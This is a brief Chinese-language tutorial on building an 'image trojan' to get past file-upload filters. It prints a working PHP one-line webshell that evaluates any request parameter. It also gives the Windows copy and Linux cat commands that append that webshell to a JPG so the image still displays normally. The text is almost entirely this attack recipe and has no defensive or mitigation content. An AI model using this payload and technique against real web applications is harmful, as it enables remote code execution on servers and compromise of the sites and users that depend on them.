简介
图片马,顾名思义就是将图片和木马结合在一起。是文件上传漏洞重要的绕过方式。
详解
windows制作
先准备一张图片和一句话木马,木马如下:
<?php eval($_REQUEST[cmd]);?>
使用copy
命令制作,copy可以将一个或多个文件进行复制拼接,生成一个新的目标文件。
copy 1.jpg /b + 1.php /a shell.jpg
/b
表示以二进制格式复制文件,/a
表示ASCII文本格式复制文件。看下图:shell.jpg
图片可以正常显示。
使用记事本打开图片,可以在末尾看到写入的一句话木马。
kali制作
linux系统可以使用cat
命令制作。同样准备图片和一句话木马。
cat 1.jpg 1.php >shell.jpg
同windows系统一样,图片显示正常,可以使用vim命令看到末尾有一句话木马,如下图: